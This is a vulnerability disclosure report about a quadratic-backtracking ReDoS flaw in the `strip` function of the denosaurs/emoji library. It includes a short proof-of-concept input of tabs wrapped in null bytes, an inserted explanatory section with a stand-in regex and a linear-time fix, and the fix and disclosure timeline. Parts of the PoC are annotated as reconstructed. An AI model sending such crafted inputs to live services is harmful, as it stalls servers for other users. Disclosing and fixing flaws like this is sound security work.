ReDoS vulnerability in `strip` function in denosaurs/emoji


Reported on Apr 15th 2023


The reTrimSpace regular expression has second-degree (quadratic) polynomial backtracking, so a sufficiently large input makes a call to `strip` take a long time to return.

Proof of Concept

import * as emoji from "";  // the module URL is missing from the report as captured

const input = '\x00' + '\t'.repeat(154773) + '\t\x00';
const start = performance.now();  // timing calls assumed; the captured report omits them
emoji.strip(input);               // the vulnerable function named in the title
const end = performance.now();
console.log(Number(end - start).toString());

This usually takes about 12 seconds on a fast PC.


Successful exploitation leads to staggered delays on any server that passes untrusted input to `strip`, since each call blocks for the duration of the backtracking.
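The following is an added illustration of the ReDoS class the report describes; it is not code from denosaurs/emoji. The `QUADRATIC_TRIM` regex is an assumed stand-in for the project's reTrimSpace pattern, chosen because it shows the same quadratic backtracking on PoC-shaped input, and `trimLinear` is the defender's replacement: a two-index scan that returns the same result without backtracking. `hostileInput` builds a constructed sample in the shape of the report's payload, and `growthRatio` times a call at n and 2n so the difference between quadratic and linear cost is visible at small sizes.

```javascript
// Added illustration for the ReDoS class described in the report. Not code from
// denosaurs/emoji: the regex below is an ASSUMED stand-in for the project's
// reTrimSpace pattern, chosen because it exhibits the same quadratic backtracking.
const QUADRATIC_TRIM = /^\s+|\s+$/g;

// Regex-based trim. On input shaped like the PoC ('\x00' + many '\t' + '\t\x00'),
// the `\s+$` branch matches a run of tabs, fails at the final '\x00', backtracks
// one character at a time, then retries from the next tab: O(n^2) steps overall.
function trimWithRegex(s) {
  return s.replace(QUADRATIC_TRIM, "");
}

// Single-character test using the same \s class as the regex, so both trims
// agree on exactly which code points count as whitespace.
function isWhitespace(ch) {
  return /\s/.test(ch);
}

// Linear-time trim: two index scans, no backtracking, same result as the regex.
function trimLinear(s) {
  let start = 0;
  let end = s.length;
  while (start < end && isWhitespace(s[start])) start++;
  while (end > start && isWhitespace(s[end - 1])) end--;
  return s.slice(start, end);
}

// Builds input in the shape of the report's PoC (constructed sample, not real data).
function hostileInput(tabs) {
  return "\x00" + "\t".repeat(tabs) + "\t\x00";
}

// Wall-clock cost of one call, in milliseconds.
function measureMs(fn, arg) {
  const t0 = performance.now();
  fn(arg);
  return performance.now() - t0;
}

// Doubling the input: a quadratic routine roughly quadruples, a linear one doubles.
function growthRatio(fn, n) {
  const small = measureMs(fn, hostileInput(n));
  const large = measureMs(fn, hostileInput(2 * n));
  return small > 0 ? large / small : Infinity;
}

// Small n keeps the demo fast; the report's 154773 tabs takes ~12 s on the regex.
const n = 3000;
console.log("regex  trim ratio (2n/n):", growthRatio(trimWithRegex, n).toFixed(1));
console.log("linear trim ratio (2n/n):", growthRatio(trimLinear, n).toFixed(1));
```

The defensive point is that the two functions are interchangeable on every input, so swapping the regex for the scan removes the attacker-controlled cost without changing behaviour; capping the length of untrusted input before it reaches any regex-based routine is the complementary mitigation when the pattern itself cannot be changed.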

We are processing your report and will contact the denosaurs/emoji team within 24 hours. 5 months ago
Tristan F. modified the report 5 months ago
We created a GitHub Issue asking the maintainers to create a 5 months ago
We have contacted a member of the denosaurs/emoji team and are waiting to hear back 5 months ago
We have sent a follow up to the denosaurs/emoji team. We will try again in 7 days. 5 months ago
denosaurs/emoji maintainer validated this vulnerability 5 months ago
Tristan F. has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
denosaurs/emoji maintainer marked this as fixed in 0.3.0 with commit a61ec1 5 months ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
denosaurs/emoji maintainer published this vulnerability 5 months ago